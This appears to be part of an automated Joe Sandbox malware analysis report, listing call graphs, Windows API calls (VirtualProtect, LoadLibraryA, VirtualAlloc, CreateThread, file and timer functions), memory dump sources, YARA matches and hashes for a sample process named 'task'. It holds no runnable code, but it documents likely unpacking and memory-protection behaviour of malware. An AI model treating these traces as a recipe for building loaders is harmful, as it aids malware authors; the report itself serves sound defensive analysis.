36898->36899 36900 6c8dd740 36899->36900 36904 6c8ac770 HeapFree 36899->36904 36905 6c8ac770 HeapFree 36900->36905 36903 6c8dd74f 36904->36900 36905->36903 36906 6c8aa3b0 36909 6c8aa3c0 36906->36909 36918 6c8a2e70 36909->36918 36916 6c8a6980 35 API calls 36917 6c8aa3b9 36916->36917 36931 6c8a3190 36918->36931 36922 6c8a2ef1 36923 6c8a6980 36922->36923 36971 6c8a68b0 36923->36971 36926 6c8a2d40 36990 6c8a2f00 36926->36990 36930 6c8a2dc1 36930->36916 36935 6c8a3c40 36931->36935 36934 6c8a2030 33 API calls __DllMainCRTStartup@12 36934->36922 36936 6c8a3cfa 36935->36936 36938 6c8a3d06 36935->36938 36965 6c8a5dd0 40 API calls 36936->36965 36944 6c8a3d6c 36938->36944 36966 6c8ac000 35 API calls __DllMainCRTStartup@12 36938->36966 36940 6c8d4490 33 API calls 36942 6c8a3dda 36940->36942 36941 6c8a3dc0 36967 6c8a2130 33 API calls __DllMainCRTStartup@12 36941->36967 36945 6c8ac330 __DllMainCRTStartup@12 33 API calls 36942->36945 36944->36940 36946 6c8a3f32 36945->36946 36947 6c8d5be0 33 API calls 36946->36947 36950 6c8a3fe4 36947->36950 36948 6c8d5be0 33 API calls 36949 6c8a405d 36948->36949 36951 6c8a5e70 HeapFree 36949->36951 36950->36948 36952 6c8a408e 36951->36952 36953 6c8a4140 36952->36953 36968 6c8d4060 35 API calls __DllMainCRTStartup@12 36952->36968 36954 6c8ac330 __DllMainCRTStartup@12 33 API calls 36953->36954 36956 6c8a4183 36954->36956 36957 6c8a8630 __DllMainCRTStartup@12 33 API calls 36956->36957 36958 6c8a41e6 36957->36958 36959 6c8dd570 36 API calls 36958->36959 36960 6c8a425d 36959->36960 36964 6c8a2ec5 36960->36964 36969 6c8a6a50 34 API calls 36960->36969 36962 6c8a4355 36970 6c8ca0f0 33 API calls __DllMainCRTStartup@12 36962->36970 36964->36934 36965->36938 36966->36941 36967->36944 36968->36953 36969->36962 36970->36964 36978 6c8a68a0 36971->36978 36975 6c8a690d 36982 6c8a6a50 34 API calls 36975->36982 36977 6c8a6925 36977->36926 36983 6c8a6890 36978->36983 36981 6c8ca0f0 33 API calls __DllMainCRTStartup@12 36981->36975 36982->36977 36986 6c8a6990 

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • NtReadFile.NTDLL ref: 6C8DC855
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8DC865
                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6C8DC89D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileObjectReadSingleStatusWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3583596364-0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                • String ID: $
                                                                                                                                                                • API String ID: 31276548-3993045852
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6C8F0A64
                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6C8F0A7E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2442719207-0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6C8F0B0A
                                                                                                                                                                • dllmain_crt_dispatch.LIBCMT ref: 6C8F0B21
                                                                                                                                                                • DllMain.G2M(?,00000001,00000000,?,00000001,00000000,?,00000001,00000000,6C91B280,0000000C,00000007,6C91B258,00000010,6C8F0911,?), ref: 6C8F0B38
                                                                                                                                                                • DllMain.G2M(?,00000000,00000000,?,00000001,00000000,?,00000001,00000000,6C91B280,0000000C,00000007,6C91B258,00000010,6C8F0911,?), ref: 6C8F0B50
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6C8F0B69
                                                                                                                                                                • dllmain_crt_dispatch.LIBCMT ref: 6C8F0B7C
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6C8F0B8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: dllmain_raw$Maindllmain_crt_dispatch
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2381195575-0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,00120114,FFFFFFFF,?,?,00000000,00000000), ref: 6C8DC2E8
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DC306
                                                                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000006,00000000,00000008), ref: 6C8DC331
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DC352
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DC380
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6C8DC38D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1617036312-0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D42AB
                                                                                                                                                                • SetWaitableTimer.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,?,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4311
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D431E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4327
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4338
                                                                                                                                                                • Sleep.KERNEL32(FFFFFFFF,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4399
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2261246915-0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8C93B0: GetSystemInfo.KERNEL32 ref: 6C8C9479
                                                                                                                                                                • CreateFileMappingW.KERNEL32 ref: 6C8C990F
                                                                                                                                                                • MapViewOfFile.KERNEL32 ref: 6C8C9A01
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateInfoMappingSystemView
                                                                                                                                                                • String ID: "$@
                                                                                                                                                                • API String ID: 3466721412-1136454570

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 02648EF1: LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02648F83
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,0000000C,00000040,?), ref: 02646D2E
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,0000000C,?,?), ref: 02646D61
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,0040145E,00000040,?), ref: 02646D94
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,0040145E,?,?), ref: 02646DBE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                • String ID:

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02648F83
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: .$.dll

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • __freea.LIBCMT ref: 6C901209
                                                                                                                                                                  • Part of subcall function 6C8F93EF: HeapAlloc.KERNEL32(00000000,?,?,?,00000003,6C8F681B,?,?,?,?,00000000,?,00000000,?,?,6C8F8FBF), ref: 6C8F9421
                                                                                                                                                                • __freea.LIBCMT ref: 6C90121C
                                                                                                                                                                • __freea.LIBCMT ref: 6C901229
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __freea$AllocHeap
                                                                                                                                                                • String ID:

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 02647A61
                                                                                                                                                                • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 02647AC5
                                                                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 02647B2E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ArraySafe$AllocCreateDestroyString
                                                                                                                                                                • String ID:

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetFileInformationByHandle.KERNELBASE(?,?), ref: 6C8DC3C7
                                                                                                                                                                • GetFileInformationByHandleEx.KERNEL32(?,00000009,00000000,00000008), ref: 6C8DC3F9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DC46B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileHandleInformation$ErrorLast
                                                                                                                                                                • String ID:

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8FB951: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 6C8FB97C
                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,6C8FBC61,?,00000000,?,00000000,?), ref: 6C8FBE7B
                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,6C8FBC61,?,00000000,?,00000000,?), ref: 6C8FBEB7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 546120528-0

                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNELBASE(00000000,?,Function_0003D6D0,00000000,00010000,00000000), ref: 6C8DD5DB
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DD633
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateErrorLastThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1689873465-0

                                                                                                                                                                APIs
                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6C8F0963
                                                                                                                                                                  • Part of subcall function 6C8F0E1B: InitializeSListHead.KERNEL32(6C933C88,6C8F096D,6C91B238,00000010,6C8F08FE,?,?,?,6C8F0B26,?,00000001,?,?,00000001,?,6C91B280), ref: 6C8F0E20
                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C8F09CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3231365870-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 02648EF1: LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02648F83
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,00000004,00000040,?), ref: 02646E06
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,00000004,?,?), ref: 02646E29
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 895956442-0
                                                                                                                                                                APIs
                                                                                                                                                                • LCMapStringEx.KERNELBASE(?,6C901144,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 6C8F8BFD
                                                                                                                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,6C901144,?,?,-00000008,?,00000000), ref: 6C8F8C1B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2568140703-0
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02647BBD
                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 02647F01
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2087232378-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(-00000004,00000001,6C8F87DD,6C8F887D,?,6C8F80F4,00000000,00000000), ref: 6C8FAA95
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6C8FAB37
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,6C8FBC61,?), ref: 6C8FBA57
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Info
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1807457897-0
                                                                                                                                                                APIs
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                APIs
                                                                                                                                                                • SetThreadStackGuarantee.KERNELBASE(?), ref: 6C8DD70B
                                                                                                                                                                  • Part of subcall function 6C8AC770: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8DA128
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeGuaranteeHeapStackThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4181682901-0
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8B1317), ref: 6C8C7779
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,6C8FAADE,00000001,00000364,00000000,00000002,000000FF,?,6C8F80F4,00000000,00000000), ref: 6C8F882C
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00550000,?,?,?,6C8DA0EC), ref: 6C8DC165
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,6C8C6A1E), ref: 6C8C7826
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 6C8D4E4B
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: 11dc6013cbdf125dd3919d475c417d5132546a7615f82942ca9f71d4ae3e6e36
                                                                                                                                                                • Instruction ID: 1fcea91eb2d1e725baaffce33d72c8ab8dd3b45cbca5f4a24e236f436d19af47
                                                                                                                                                                • Opcode Fuzzy Hash: 11dc6013cbdf125dd3919d475c417d5132546a7615f82942ca9f71d4ae3e6e36
                                                                                                                                                                • Instruction Fuzzy Hash: 1A7123B4500B449BD730CF2AC680B52BBF1BF8A718F548A2DD8DA8BA41D775F449CB91
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE ref: 6C8A80A7
                                                                                                                                                                  • Part of subcall function 6C8D4280: CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D42AB
                                                                                                                                                                  • Part of subcall function 6C8D4280: SetWaitableTimer.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,?,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4311
                                                                                                                                                                  • Part of subcall function 6C8D4280: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D431E
                                                                                                                                                                  • Part of subcall function 6C8D4280: CloseHandle.KERNEL32(00000000,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4327
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: TimerWaitable$AllocCloseCreateHandleObjectSingleVirtualWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3175046113-0
                                                                                                                                                                • Opcode ID: 4317adf3b219974f22386554eb3b29e7217757a2f954247cdd39f270cfecd91a
                                                                                                                                                                • Instruction ID: c5ab90b91103a78055d9e7f34a79234a65567d786e57c99b40ff7a3273e08516
                                                                                                                                                                • Opcode Fuzzy Hash: 4317adf3b219974f22386554eb3b29e7217757a2f954247cdd39f270cfecd91a
